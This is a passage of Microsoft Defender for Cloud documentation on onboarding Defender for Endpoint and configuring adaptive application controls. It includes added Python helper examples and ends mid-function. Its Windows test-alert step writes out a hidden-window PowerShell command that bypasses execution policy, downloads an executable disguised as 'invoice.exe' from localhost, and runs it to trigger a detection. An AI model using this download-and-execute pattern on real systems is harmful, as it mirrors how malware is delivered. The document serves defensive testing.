                                - To view Defender for Endpoint alerts in Defender for Cloud: Security reader, Reader, Resource Group Contributor, Resource Group Owner, Security admin, Subscription owner, or Subscription Contributor
Clouds:                         ✔ Commercial clouds
                                ✔ Azure Government
                                ✖ Microsoft Azure operated by 21Vianet
                                ✔ Connected AWS accounts
                                ✔ Connected GCP projects


Benefits of integrating Microsoft Defender for 
Endpoint with Defender for Cloud 


Microsoft Defender for Endpoint protects your Windows and Linux machines whether 
they're hosted in Azure, hybrid clouds (on-premises), or multicloud environments. 


The protections include: 


• Advanced post-breach detection sensors. Defender for Endpoint's sensors collect a vast array of behavioral signals from your machines.

• Vulnerability assessment from Microsoft Defender Vulnerability Management. With Microsoft Defender for Endpoint installed, Defender for Cloud can show vulnerabilities discovered by Defender Vulnerability Management and also offer this module as a supported vulnerability assessment solution. Learn more in Investigate weaknesses with Microsoft Defender Vulnerability Management.

  This module also brings the software inventory features described in Access a software inventory and can be automatically enabled for supported machines with the auto deploy settings.

• Analytics-based, cloud-powered, post-breach detection. Defender for Endpoint quickly adapts to changing threats. It uses advanced analytics and big data. It's amplified by the power of the Intelligent Security Graph with signals across Windows, Azure, and Office to detect unknown threats. It provides actionable alerts and enables you to respond quickly.

• Threat intelligence. Defender for Endpoint generates alerts when it identifies attacker tools, techniques, and procedures. It uses data generated by Microsoft threat hunters and security teams, augmented by intelligence provided by partners.


When you integrate Defender for Endpoint with Defender for Cloud, you gain access to 
the benefits from the following extra capabilities: 


• Automated onboarding. Defender for Cloud automatically enables the Defender for Endpoint sensor on all supported machines connected to Defender for Cloud.

• Single pane of glass. The Defender for Cloud portal pages display Defender for Endpoint alerts. To investigate further, use Microsoft Defender for Endpoint's own portal pages where you'll see additional information such as the alert process tree and the incident graph. You can also see a detailed machine timeline that shows every behavior for a historical period of up to six months.


What are the requirements for the Microsoft Defender for Endpoint tenant?


A Defender for Endpoint tenant is automatically created, when you use Defender for 
Cloud to monitor your machines. 


• Location: Data collected by Defender for Endpoint is stored in the geo-location of the tenant as identified during provisioning. Customer data - in pseudonymized form - may also be stored in the central storage and processing systems in the United States. After you've configured the location, you can't change it. If you have your own license for Microsoft Defender for Endpoint and need to move your data to another location, contact Microsoft support to reset the tenant.

• Moving subscriptions: If you've moved your Azure subscription between Azure tenants, some manual preparatory steps are required before Defender for Cloud will deploy Defender for Endpoint. For full details, contact Microsoft support.


Enable the Microsoft Defender for Endpoint 
integration 


Prerequisites 


Before you can enable the Microsoft Defender for Endpoint integration with Defender 
for Cloud, you must confirm that your machine meets the necessary requirements for 
Defender for Endpoint: 


• Ensure the machine is connected to Azure and the internet as required:

  ◦ Azure virtual machines (Windows or Linux) - Configure the network settings described in Configure device proxy and internet connectivity settings: Windows or Linux.

  ◦ On-premises machines - Connect your target machines to Azure Arc as explained in Connect hybrid machines with Azure Arc-enabled servers.

• Enable Microsoft Defender for Servers. See Quickstart: Enable Defender for Cloud's enhanced security features.

  Important

  Defender for Cloud's integration with Microsoft Defender for Endpoint is enabled by default. So when you enable enhanced security features, you give consent for Microsoft Defender for Servers to access the Microsoft Defender for Endpoint data related to vulnerabilities, installed software, and alerts for your endpoints.

• For Windows servers, make sure that your servers meet the requirements for onboarding Microsoft Defender for Endpoint.

• For Linux servers, you must have Python installed. Python 3 is recommended for all distros, but is required for RHEL 8.x and Ubuntu 20.04 or higher. If needed, see Step-by-step Instructions for Installing Python on Linux.

• If you've moved your subscription between Azure tenants, some manual preparatory steps are also required. For details, contact Microsoft support.


Enable the integration 


• On Windows

• On Linux


Windows 


The MDE unified solution doesn't use or require installation of the Log Analytics agent. 
The unified solution is automatically deployed for Azure Windows 2012 R2 and 2016 
servers, Windows servers connected through Azure Arc, and Windows multicloud 
servers connected through the multicloud connectors. 


You'll deploy Defender for Endpoint to your Windows machines in one of two ways - 
depending on whether you've already deployed it to your Windows machines: 


• Users with Defender for Servers enabled and Microsoft Defender for Endpoint deployed
• Users who never enabled the integration with Microsoft Defender for Endpoint


Users with Defender for Servers enabled and Microsoft Defender 
for Endpoint deployed 


If you've already enabled the integration with Defender for Endpoint, you have 
complete control over when and whether to deploy the MDE unified solution to your 
Windows machines. 


To deploy the MDE unified solution, you need to use the REST API call or the Azure 
portal: 


1. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the Windows machines that you want to receive Defender for 
Endpoint. 


2. In the Monitoring coverage column of the Defender for Servers plan, select 
Settings. 


The status of the Endpoint protections component is Partial, meaning that not all parts of the component are enabled.

Note

If the status is Off, use the instructions in Users who've never enabled the integration with Microsoft Defender for Endpoint for Windows.


3. Select Fix to see the components that aren't enabled. 


[Screenshot: the Settings & monitoring page for the Servers plan, listing the Log Analytics agent/Azure Monitor agent, Vulnerability assessment for machines, Endpoint protection ("1 of 2 components missing. Fix") and Agentless scanning for machines (preview) components with their configuration and status toggles.]


4. To enable the Unified solution for Windows Server 2012 R2 and 2016 machines, 
select Enable. 


[Screenshot: the Missing components pane for Microsoft Defender for Endpoint, with an Enable button for Linux machines (auto-provisions Defender for Endpoint to new and existing Linux machines) and for the Unified solution (auto-provisions the new unified solution to new and existing Windows Server 2012 R2 and 2016 machines).]


5. To save the changes, select Save at the top of the page and then select Continue in the Settings and monitoring page.

Microsoft Defender for Cloud will:

• Stop the existing MDE process in the Log Analytics agent that collects data for Defender for Servers.
• Install the MDE unified solution for all existing and new Windows Server 2012 R2 and 2016 machines.


Microsoft Defender for Cloud will automatically onboard your machines to Microsoft 
Defender for Endpoint. Onboarding might take up to 12 hours. For new machines 
created after the integration has been enabled, onboarding takes up to an hour. 


Note


If you choose not to deploy the MDE unified solution to your Windows 2012 R2 
and 2016 servers in Defender for Servers Plan 2 and then downgrade Defender for 
Servers to Plan 1, the MDE unified solution is not deployed to those servers so that 
your existing deployment is not changed without your explicit consent. 


Users who never enabled the integration with Microsoft Defender 
for Endpoint for Windows 


If you've never enabled the integration for Windows, Endpoint protection enables Defender for Cloud to deploy Defender for Endpoint to both your Windows and Linux machines.


To deploy the MDE unified solution, you'll need to use the REST API call or the Azure 
portal: 


1. From Defender for Cloud's menu, select Environment settings and select the subscription with the machines that you want to receive Defender for Endpoint.

2. In the status of the Endpoint protection component, select On to enable the integration with Microsoft Defender for Endpoint.

The MDE agent unified solution is deployed to all of the machines in the selected subscription.


Linux 


You'll deploy Defender for Endpoint to your Linux machines in one of these ways, 
depending on whether you've already deployed it to your Windows machines: 


• Enable for a specific subscription in the Azure portal environment settings
  ◦ Existing users with Defender for Cloud's enhanced security features enabled and Microsoft Defender for Endpoint for Windows
  ◦ New users who never enabled the integration with Microsoft Defender for Endpoint for Windows
• Enable for multiple subscriptions in the Azure portal dashboard
• Enable for multiple subscriptions with a PowerShell script


Note


When you enable automatic deployment, Defender for Endpoint for Linux 
installation will abort on machines with pre-existing running services using fanotify 
and other services that can also cause MDE to malfunction or may be affected by 
MDE, such as security services. After you validate potential compatibility issues, we 
recommend that you manually install Defender for Endpoint on these servers. 


Existing users with Defender for Cloud's enhanced security 
features enabled and Microsoft Defender for Endpoint for 
Windows 


If you've already enabled the integration with Defender for Endpoint for Windows, you 
have complete control over when and whether to deploy Defender for Endpoint to your 
Linux machines. 


1. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the Linux machines that you want to receive Defender for 
Endpoint. 


2. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


The status of the Endpoint protections component is Partial, meaning that not all parts of the component are enabled.

Note

If the status is Off, use the instructions in Users who've never enabled the integration with Microsoft Defender for Endpoint for Windows.


3. Select Fix to see the components that aren't enabled. 


[Screenshot: the Settings & monitoring page for the Servers plan, listing the Log Analytics agent/Azure Monitor agent, Vulnerability assessment for machines, Endpoint protection and Agentless scanning for machines (preview) components with their configuration and status toggles.]


4. To enable deployment to Linux machines, select Enable. 


[Screenshot: the Missing components pane for Microsoft Defender for Endpoint, with an Enable button for Linux machines (auto-provisions Defender for Endpoint to new and existing Linux machines) and for the Unified solution (auto-provisions the new unified solution to new and existing Windows Server 2012 R2 and 2016 machines).]


5. To save the changes, select Save at the top of the page and then select Continue in the Settings and monitoring page.

Microsoft Defender for Cloud will:

• Automatically onboard your Linux machines to Defender for Endpoint
• Detect any previous installations of Defender for Endpoint and reconfigure them to integrate with Defender for Cloud

Microsoft Defender for Cloud will automatically onboard your machines to Microsoft Defender for Endpoint. Onboarding might take up to 12 hours. For new machines created after the integration has been enabled, onboarding takes up to an hour.


Note


The next time you return to this page of the Azure portal, the Enable for Linux 
machines button won't be shown. To disable the integration for Linux, you'll 
need to disable it for Windows too by turning the toggle off in Endpoint 
Protection, and selecting Continue. 


6. To verify installation of Defender for Endpoint on a Linux machine, run the 
following shell command on your machines: 


mdatp health 


If Microsoft Defender for Endpoint is installed, you'll see its health status: 


healthy : true 
licensed: true 


Also, in the Azure portal you'll see a new Azure extension on your machines called 
MDE.Linux. 


New users who never enabled the integration with Microsoft 
Defender for Endpoint for Windows 


If you've never enabled the integration for Windows, endpoint protection enables 
Defender for Cloud to deploy Defender for Endpoint to both your Windows and Linux 
machines. 


1. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the Linux machines that you want to receive Defender for 
Endpoint. 


2. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


3. In the status of the Endpoint protection component, select On to enable the 
integration with Microsoft Defender for Endpoint. 


Microsoft Defender for Cloud will: 


• Automatically onboard your Windows and Linux machines to Defender for Endpoint

• Detect any previous installations of Defender for Endpoint and reconfigure them to integrate with Defender for Cloud

Onboarding might take up to 1 hour.

4. Select Continue and Save to save your settings.


5. To verify installation of Defender for Endpoint on a Linux machine, run the 
following shell command on your machines: 


mdatp health 


If Microsoft Defender for Endpoint is installed, you'll see its health status: 


healthy : true
licensed: true


In addition, in the Azure portal you'll see a new Azure extension on your machines 
called MDE.Linux. 


Enable for multiple subscriptions in the Azure portal dashboard 


If one or more of your subscriptions don't have Endpoint protections enabled for Linux 
machines, you'll see an insight panel in the Defender for Cloud dashboard. The insight 
panel tells you about subscriptions that have Defender for Endpoint integration enabled 
for Windows machines, but not for Linux machines. You can use the insight panel to see 
the affected subscriptions with the number of affected resources in each subscription. 


Subscriptions that don't have Linux machines show no affected resources. You can then 
select the subscriptions to enable endpoint protection for Linux integration. 


After you select Enable in the insight panel, Defender for Cloud: 


• Automatically onboards your Linux machines to Defender for Endpoint in the selected subscriptions.

• Detects any previous installations of Defender for Endpoint and reconfigures them to integrate with Defender for Cloud.


Use the Defender for Endpoint status workbook to verify installation and deployment status of Defender for Endpoint on a Linux machine.


Enable for multiple subscriptions with a PowerShell script 


Use our PowerShell script from the Defender for Cloud GitHub repository to enable
endpoint protection on Linux machines that are in multiple subscriptions. 


Manage automatic updates configuration for Linux 


In Windows, Defender for Endpoint version updates are provided via continuous 
knowledge base updates; in Linux you need to update the Defender for Endpoint 
package. When you use Defender for Servers with the MDE.Linux extension, automatic 
updates for Microsoft Defender for Endpoint are enabled by default. If you wish to 
manage the Defender for Endpoint version updates manually, you can disable automatic 
updates on your machines. To do so, add the following tag for machines onboarded 
with the MDE.Linux extension. 


e Tag name: 'ExcludeMdeAutoUpdate' 
e Tag value: ‘true’ 


This configuration is supported for Azure VMs and Azure Arc machines, where the MDE.Linux extension initiates auto-update.


Enable the MDE unified solution at scale 


You can also enable the MDE unified solution at scale through the supplied REST API 
version 2022-05-01. For full details, see the API documentation. 


Here's an example request body for the PUT request to enable the MDE unified solution: 


URI:

https://management.azure.com/subscriptions/<subscriptionId>/providers/Microsoft.Security/settings/WDATP_UNIFIED_SOLUTION?api-version=2022-05-01

JSON

{
  "name": "WDATP_UNIFIED_SOLUTION",
  "type": "Microsoft.Security/settings",
  "kind": "DataExportSettings",
  "properties": {
    "enabled": true
  }
}

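The PUT described above, as an added example that is not Microsoft's script or code from this page: it builds the request for each subscription and sends it with a bearer token supplied by the caller. The `requests` package, the token acquisition and the `send` hook are assumptions; the setting name, API version and body are the ones quoted above.

```python
"""Added example (not from the Microsoft docs page): build and send the PUT that
enables the MDE unified solution on one or more subscriptions.

Assumptions (not on the page): the caller already holds an Azure AD bearer token for
the ARM scope, and the Python `requests` package is available for the HTTP call.
"""
from __future__ import annotations

import json
from typing import Callable, Iterable

ARM = "https://management.azure.com"
API_VERSION = "2022-05-01"            # API version quoted on the page
SETTING_NAME = "WDATP_UNIFIED_SOLUTION"


def enable_request(subscription_id: str) -> tuple[str, dict]:
    """Return (url, body) for the PUT that enables the MDE unified solution."""
    url = (f"{ARM}/subscriptions/{subscription_id}/providers/Microsoft.Security"
           f"/settings/{SETTING_NAME}?api-version={API_VERSION}")
    body = {
        "name": SETTING_NAME,
        "type": "Microsoft.Security/settings",
        "kind": "DataExportSettings",
        "properties": {"enabled": True},
    }
    return url, body


def enable_many(subscription_ids: Iterable[str], token: str,
                send: Callable[[str, dict, dict], int] | None = None) -> dict[str, int]:
    """PUT the setting on every subscription; returns {subscription_id: HTTP status}.

    `send(url, headers, body)` is injectable so the logic can be exercised offline;
    when it is None the real call is made with `requests` (assumed installed).
    """
    if send is None:
        import requests

        def send(url: str, headers: dict, body: dict) -> int:
            resp = requests.put(url, headers=headers, data=json.dumps(body), timeout=30)
            return resp.status_code

    headers = {"Authorization": f"Bearer {token}",
               "Content-Type": "application/json"}
    results: dict[str, int] = {}
    for sub in subscription_ids:
        url, body = enable_request(sub)
        results[sub] = send(url, headers, body)
    return results


if __name__ == "__main__":
    # Placeholder ids and token; replace with your own before running for real.
    print(enable_many(["<subscriptionId>"], "<bearer token>",
                      send=lambda u, h, b: 200))
```

A 200 for every subscription means the setting was accepted; anything else is worth checking against the API documentation's error body before assuming the machines were onboarded.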

Track MDE deployment status 


You can use the Defender for Endpoint deployment status workbook to track the MDE deployment status on your Azure VMs and non-Azure machines that are connected via Azure Arc. The interactive workbook provides an overview of machines in your environment showing their Microsoft Defender for Endpoint extension deployment status.


Access the Microsoft Defender for Endpoint 
portal 


1. Ensure the user account has the necessary permissions. Learn more in Assign user access to Microsoft Defender Security Center.


2. Check whether you have a proxy or firewall that is blocking anonymous traffic. The Defender for Endpoint sensor connects from the system context, so anonymous traffic must be permitted. To ensure unhindered access to the Defender for Endpoint portal, follow the instructions in Enable access to service URLs in the proxy server.


3. Open the Microsoft 365 Defender portal. Learn about Microsoft Defender for Endpoint in Microsoft 365 Defender.


Send a test alert 


To generate a benign test alert from Defender for Endpoint, select the tab for the 
relevant operating system of your endpoint: 


• Test on Windows

• Test on Linux


Test on Windows 

For endpoints running Windows: 
1. Create a folder 'C:\test-MDATP-test'.
2. Use Remote Desktop to access your machine. 
3. Open a command-line window. 


4. At the prompt, copy and run the following command. The command prompt window will close automatically.


PowerShell 


powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe'); Start-Process 'C:\\test-MDATP-test\\invoice.exe'




If the command is successful, you'll see a new alert on the workload protection 
dashboard and the Microsoft Defender for Endpoint portal. This alert might take a 
few minutes to appear. 


5. To review the alert in Defender for Cloud, go to Security alerts > Suspicious 
PowerShell CommandLine. 


6. From the investigation window, select the link to go to the Microsoft Defender for 
Endpoint portal. 


Tip


The alert is triggered with Informational severity. 


Test on Linux 
For endpoints running Linux: 
1. Download the test alert tool from: https://aka.ms/LinuxDIY
2. Extract the contents of the zip file and execute this shell script:
   ./mde_linux_edr_diy


If the command is successful, you'll see a new alert on the workload protection 
dashboard and the Microsoft Defender for Endpoint portal. This alert might take a 
few minutes to appear. 


3. To review the alert in Defender for Cloud, go to Security alerts > Enumeration of files with sensitive data.


4. From the investigation window, select the link to go to the Microsoft Defender for 
Endpoint portal. 


Tip


The alert is triggered with Low severity. 


Remove Defender for Endpoint from a machine 


To remove the Defender for Endpoint solution from your machines: 


1. Disable the integration: 
a. From Defender for Cloud's menu, select Environment settings and select the 
subscription with the relevant machines. 
b. In the Defender plans page, select Settings & Monitoring. 
c. In the status of the Endpoint protection component, select Off to disable the 
integration with Microsoft Defender for Endpoint. 
d. Select Continue and Save to save your settings. 


2. Remove the MDE.Windows/MDE.Linux extension from the machine. 


3. Follow the steps in Offboard devices from the Microsoft Defender for Endpoint 
service from the Defender for Endpoint documentation. 


Next steps 


• Platforms and features supported by Microsoft Defender for Cloud

• Learn how recommendations help you protect your Azure resources

• View common questions about the Defender for Cloud integration with Microsoft Defender for Endpoint


Use adaptive application controls to 
reduce your machines’ attack surfaces 


Article • 08/09/2023


Learn about the benefits of Microsoft Defender for Cloud's adaptive application controls 
and how you can enhance your security with this data-driven, intelligent feature. 


What are adaptive application controls? 


Adaptive application controls are an intelligent and automated solution for defining 
allowlists of known-safe applications for your machines. 


Often, organizations have collections of machines that routinely run the same processes. 
Microsoft Defender for Cloud uses machine learning to analyze the applications running 
on your machines and create a list of the known-safe software. Allowlists are based on 
your specific Azure workloads, and you can further customize the recommendations 
using the following instructions. 


When you've enabled and configured adaptive application controls, you'll get security 
alerts if any application runs other than the ones you've defined as safe. 


What are the benefits of adaptive application 
controls? 


By defining lists of known-safe applications, and generating alerts when anything else is 
executed, you can achieve multiple oversight and compliance goals: 


• Identify potential malware, even any that might be missed by antimalware solutions

• Improve compliance with local security policies that dictate the use of only licensed software

• Identify outdated or unsupported versions of applications

• Identify software that's banned by your organization but is nevertheless running on your machines

• Increase oversight of apps that access sensitive data


No enforcement options are currently available. Adaptive application controls are 
intended to provide security alerts if any application runs other than the ones you've 
defined as safe. 


Availability 


Aspect | Details

Release state: General availability (GA)

Pricing: Requires Microsoft Defender for Servers Plan 2

Supported machines: ✔ Azure and non-Azure machines running Windows and Linux; ✔ Azure Arc machines

Required roles and permissions: Security Reader and Reader roles can both view groups and the lists of known-safe applications. Contributor and Security Admin roles can both edit groups and the lists of known-safe applications.

Clouds: ✔ Commercial clouds; ✔ National (Azure Government, Microsoft Azure operated by 21Vianet); ✔ Connected AWS accounts


Enable application controls on a group of 
machines 


If Microsoft Defender for Cloud has identified groups of machines in your subscriptions 
that consistently run a similar set of applications, you'll be prompted with the following 
recommendation: Adaptive application controls for defining safe applications should 
be enabled on your machines. 


Select the recommendation, or open the adaptive application controls page to view the 
list of suggested known-safe applications and groups of machines. 


1. Open the Workload protections dashboard and from the advanced protection area, select Adaptive application controls.

   [Screenshot: Microsoft Defender for Cloud | Workload protections dashboard]


The Adaptive application controls page opens with your VMs grouped into the 
following tabs: 


• Configured - Groups of machines that already have a defined allowlist of applications. For each group, the configured tab shows:
  ◦ the number of machines in the group
  ◦ recent alerts

• Recommended - Groups of machines that consistently run the same applications, and don't have an allowlist configured. We recommend that you enable adaptive application controls for these groups.


Tip


If you see a group name with the prefix REVIEWGROUP, it contains 
machines with a partially consistent list of applications. Microsoft 
Defender for Cloud can't see a pattern but recommends reviewing this 
group to see whether you can manually define some adaptive 
application controls rules as described in Edit a group's adaptive 
application controls rule. 


You can also move machines from this group to other groups as 
described in Move a machine from one group to another. 


• No recommendation - Machines without a defined allowlist of applications, and which don't support the feature. Your machine might be in this tab for the following reasons:

  ◦ It's missing a Log Analytics agent
  ◦ The Log Analytics agent isn't sending events
  ◦ It's a Windows machine with a pre-existing AppLocker policy enabled by either a GPO or a local security policy
  ◦ AppLocker isn't available (Windows Server Core installations)


Tip

Defender for Cloud needs at least two weeks of data to define the unique recommendations per group of machines. Machines that have recently been created, or which belong to subscriptions that were only recently protected by Microsoft Defender for Servers, will appear under the No recommendation tab.


2. Open the Recommended tab. The groups of machines with recommended allowlists appear.

   [Screenshot: Adaptive application controls page, Recommended tab, listing groups (for example GROUP1, GROUP4, GROUP6, REVIEWGROUP1, REVIEWGROUP2) with the number of machines in each and the state Open]

3. Select a group. 


4. To configure your new rule, review the various sections of this Configure application control rules page and the contents, which will be unique to this specific group of machines:

   [Screenshot: Configure application control rules pane for GROUP6, with the sections Select machines, Recommended applications, and More applications. The pane's description reads: "The adaptive application controls policy is set per group and for all the machines that are selected, including such that are already configured. It includes the protection mode which will be set to audit mode. All settings can be edited once a group is configured."]


a. Select machines - By default, all machines in the identified group are selected. 
Unselect any to remove them from this rule. 


b. Recommended applications - Review this list of applications that are common 
to the machines within this group, and recommended to be allowed to run. 


c. More applications - Review this list of applications that are either seen less 
frequently on the machines within this group, or are known to be exploitable. A 
warning icon indicates that a specific application could be used by an attacker 
to bypass an application allowlist. We recommend that you carefully review 
these applications. 


Tip


Both application lists include the option to restrict a specific application to 
certain users. Adopt the principle of least privilege whenever possible. 


Applications are defined by their publishers. If an application doesn't have 
publisher information (it's unsigned), a path rule is created for the full path 
of the specific application. 


d. To apply the rule, select Audit. 


Edit a group's adaptive application controls 
rule 


You might decide to edit the allowlist for a group of machines because of known 
changes in your organization. 


To edit the rules for a group of machines: 


1. Open the Workload protections dashboard and from the advanced protection 
area, select Adaptive application controls. 


2. From the Configured tab, select the group with the rule you want to edit. 


3. Review the various sections of the Configure application control rules page as 
described in Enable adaptive application controls on a group of machines. 


4. Optionally, add one or more custom rules: 


a. Select Add rule. 


[Screenshot: Edit application control policy page with the Add rule pane open, showing the Rule type (Publisher), Allowed users, and Protected file types (EXE, MSI, SCRIPT) fields]


b. If you're defining a known safe path, change the Rule type to 'Path' and enter a single path. You can include wildcards in the path. The following examples (from the Add rule pane) show some ways to use wildcards:

   Windows (enter a single path):
   C:\Octopus\Calamari\3.3.13\Octodiff.msi
   C:\Octopus\Calamari\*\Octodiff.msi
   C:\Octopus\Calamari\*

   Linux (enter a single path):
   /opt/microsoft/omsagent/ruby/bin/1.1/ruby
   /opt/microsoft/omsagent/ruby/
   /opt/microsoft/omsagent/ruby/bin/*

Tip

Some scenarios for which wildcards in a path might be useful:

• Using a wildcard at the end of a path to allow all executables within this folder and sub-folders.

• Using a wildcard in the middle of a path to enable a known executable name with a changing folder name (for example, personal user folders containing a known executable, automatically generated folder names, etc).


c. Define the allowed users and protected file types. 
d. When you've finished defining the rule, select Add. 


5. To apply the changes, select Save. 
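Before adding path rules it helps to check which of the executable paths you have actually observed on a group's machines a candidate rule list would cover, and which would still be reported as violations in audit mode. The following is an added example, not code from this page or from Microsoft. The matching semantics are an assumption drawn from the wildcard tip above (a trailing `*` covers the folder and all sub-folders, a `*` in the middle stands in for one changing path segment, Windows paths compare case-insensitively and Linux paths case-sensitively); the rules are the page's own examples and the observed paths are constructed.

```python
"""Added example (not from the Microsoft docs page): check which observed executable
paths an adaptive application controls path rule list would cover.

Assumed matching semantics (the page only gives examples): a '*' at the very end of
a rule covers every file in that folder and its sub-folders; a '*' elsewhere stands
in for a single changing path segment; Windows paths compare case-insensitively,
Linux paths case-sensitively. Rules below are the page's examples; paths are constructed.
"""
from __future__ import annotations

import re


def compile_rule(rule: str, windows: bool) -> re.Pattern:
    """Translate one allowlist path rule into an anchored regular expression."""
    sep = r"\\" if windows else "/"
    parts = rule.split("*")
    pattern = ""
    for i, part in enumerate(parts):
        pattern += re.escape(part)
        if i < len(parts) - 1:
            trailing = i == len(parts) - 2 and parts[-1] == ""
            # Trailing wildcard: any depth below the folder. Mid-path: one segment.
            pattern += ".*" if trailing else f"[^{sep}]*"
    return re.compile(f"^{pattern}$", re.IGNORECASE if windows else 0)


def matching_rule(path: str, rules: list[str], windows: bool) -> str | None:
    """Return the first rule that covers `path`, or None if no rule allows it."""
    for rule in rules:
        if compile_rule(rule, windows).match(path):
            return rule
    return None


def uncovered(paths: list[str], rules: list[str], windows: bool) -> list[str]:
    """Observed paths that no rule covers: in audit mode each of these executions
    would be reported as a violation, so they are the ones to review before adding rules."""
    return [p for p in paths if matching_rule(p, rules, windows) is None]


# The page's example rules.
WINDOWS_RULES = [
    r"C:\Octopus\Calamari\3.3.13\Octodiff.msi",
    r"C:\Octopus\Calamari\*\Octodiff.msi",
    r"C:\Octopus\Calamari\*",
]
LINUX_RULES = [
    "/opt/microsoft/omsagent/ruby/bin/1.1/ruby",
    "/opt/microsoft/omsagent/ruby/bin/*",
]

if __name__ == "__main__":
    # Constructed sample of paths seen running on a group's machines.
    observed = [
        r"C:\Octopus\Calamari\3.4.0\Octodiff.msi",
        r"C:\Octopus\Calamari\3.4.0\tools\helper.exe",
        r"C:\Users\alice\Downloads\invoice.exe",
    ]
    for p in observed:
        print(p, "->", matching_rule(p, WINDOWS_RULES, windows=True))
    print("would alert:", uncovered(observed, WINDOWS_RULES, windows=True))
```

The design point is that the trailing-wildcard rule is the broad one: `C:\Octopus\Calamari\*` already covers everything the two narrower rules do, so when a group's list contains such a rule, the narrower ones add no coverage and only the least-privilege question (which users may run it, which file types) remains.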


Review and edit a group's settings 


1. To view the details and settings of your group, select Group settings. 


This pane shows the name of the group (which can be modified), the OS type, the 
location, and other relevant details. 


[Screenshot: Edit application control policy page with the Group settings pane open, showing Group name, Location, OS type, Environment type, File type protection mode (EXE, MSI, SCRIPT: Audit or Unconfigured), and Add machines to group with searchable lists of configured and unconfigured machines]


2. Optionally, modify the group's name or file type protection modes. 


3. Select Apply and Save. 


Respond to the "Allowlist rules in your adaptive 
application control policy should be updated" 
recommendation 


You'll see this recommendation when Defender for Cloud's machine learning identifies potentially legitimate behavior that hasn't previously been allowed. The recommendation suggests new rules for your existing definitions to reduce the number of false positive alerts.
To remediate the issues: 


1. From the recommendations page, select the Allowlist rules in your adaptive 
application control policy should be updated recommendation to see groups 
with newly identified, potentially legitimate behavior. 


2. Select the group with the rule you want to edit. 


3. Review the various sections of the Configure application control rules page as 
described in Enable adaptive application controls on a group of machines. 


4. To apply the changes, select Audit. 


Audit alerts and violations 


1. Open the Workload protections dashboard and from the advanced protection area, select Adaptive application controls.

2. To see groups with machines that have recent alerts, review the groups listed in the Configured tab.


3. To investigate further, select a group. 


[Screenshot: Edit application control policy page for GROUP4, showing Alerts (last week) with the number of machines affected, and the expandable Recent alerts, Configured machines, Publisher allowlist rules, and Path allowlist rules sections]


4. For further details, and the list of affected machines, select an alert. 


The security alerts page shows more details of the alerts and provides a Take 
action link with recommendations of how to mitigate the threat. 


[Screenshot: Security alerts page filtered on "application control", listing Medium severity "Adaptive application control ..." alerts with their affected resource, activity start time, MITRE ATT&CK tactic (Execution), and Active status]

Note

Adaptive application controls calculates events once every twelve hours. The "activity start time" shown in the security alerts page is the time that adaptive application controls created the alert, not the time that the suspicious process was active.


Move a machine from one group to another 


When you move a machine from one group to another, the application control policy 
applied to it changes to the settings of the group that you moved it to. You can also 
move a machine from a configured group to a non-configured group, which removes 
any application control rules that were applied to the machine. 


1. Open the Workload protections dashboard and from the advanced protection 
area, select Adaptive application controls. 


2. From the Adaptive application controls page, from the Configured tab, select the 
group containing the machine to be moved. 


3. Open the list of Configured machines. 


4. Open the machine's menu from three dots at the end of the row, and select Move. 
The Move machine to a different group pane opens. 


5. Select the destination group, and select Move machine. 


6. To save your changes, select Save. 


Manage application controls via the REST API 


To manage your adaptive application controls programmatically, use our REST API. 


The relevant API documentation is available in the Adaptive application Controls section 
of Defender for Cloud's API docs. 


Some of the functions available from the REST API include: 


• List retrieves all your group recommendations and provides a JSON with an object for each group.

• Get retrieves the JSON with the full recommendation data (that is, list of machines, publisher/path rules, and so on).

• Put configures your rule (use the JSON you retrieved with Get as the body for this request).


Important

The Put function expects fewer parameters than the JSON returned by the Get command contains.


Remove the following properties before using the JSON in the Put request: 
recommendationStatus, configurationStatus, issues, location, and 
sourceSystem. 
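The Get-then-Put round trip described above, as an added example that is not code from this page or from Microsoft: it strips the five properties the Important note lists from a Get response so the result can be used as the Put body, and reports anything it missed. The sample Get response is constructed and abbreviated, and the Put URL pattern (`locations/{ascLocation}/applicationWhitelistings/{groupName}`, api-version 2020-01-01) is taken from the Adaptive Application Controls section of the API reference; confirm it there before use.

```python
"""Added example (not from the Microsoft docs page): prepare the JSON returned by the
adaptive application controls Get call for the Put call.

Assumptions: SAMPLE_GET is a constructed, abbreviated Get response; the Put URL
pattern is taken from the Adaptive Application Controls section of the API reference
and should be confirmed there before use.
"""
from __future__ import annotations

import copy

ARM = "https://management.azure.com"

# Properties the page says must be removed before the JSON is used in the Put request.
PUT_DISALLOWED = ("recommendationStatus", "configurationStatus", "issues",
                  "location", "sourceSystem")

SAMPLE_GET = {  # constructed sample, not a real response
    "id": "/subscriptions/<subscriptionId>/providers/Microsoft.Security"
          "/locations/centralus/applicationWhitelistings/GROUP1",
    "name": "GROUP1",
    "type": "Microsoft.Security/applicationWhitelistings",
    "location": "centralus",
    "properties": {
        "enforcementMode": "Audit",
        "protectionMode": {"exe": "Audit", "msi": "Audit", "script": "Audit"},
        "configurationStatus": "Configured",
        "recommendationStatus": "Recommended",
        "issues": [],
        "sourceSystem": "Azure_AppLocker",
        "vmRecommendations": [
            {"resourceId": "/subscriptions/<subscriptionId>/resourceGroups/rg1"
                           "/providers/Microsoft.Compute/virtualMachines/vm1",
             "recommendationAction": "Recommended"}
        ],
        "pathRecommendations": [
            {"path": "C:\\Octopus\\Calamari\\*", "action": "Add",
             "type": "File", "fileType": "Msi", "common": True}
        ],
    },
}


def to_put_body(get_json: dict) -> dict:
    """Copy the Get response and strip the properties the Put call rejects.

    `location` sits at the top level and the others under `properties`; both
    places are checked so the result is clean whichever the service returns.
    Nested per-machine and per-path entries are left untouched. The input is
    not modified, so the original Get response stays available for comparison.
    """
    body = copy.deepcopy(get_json)
    for key in PUT_DISALLOWED:
        body.pop(key, None)
        body.get("properties", {}).pop(key, None)
    return body


def leftover_disallowed(body: dict) -> list[str]:
    """Disallowed keys still present (top level or under properties); empty means clean."""
    props = body.get("properties", {})
    return [k for k in PUT_DISALLOWED if k in body or k in props]


def put_url(subscription_id: str, asc_location: str, group_name: str) -> str:
    """URL for the adaptive application controls Put call (pattern assumed, see docstring)."""
    return (f"{ARM}/subscriptions/{subscription_id}/providers/Microsoft.Security"
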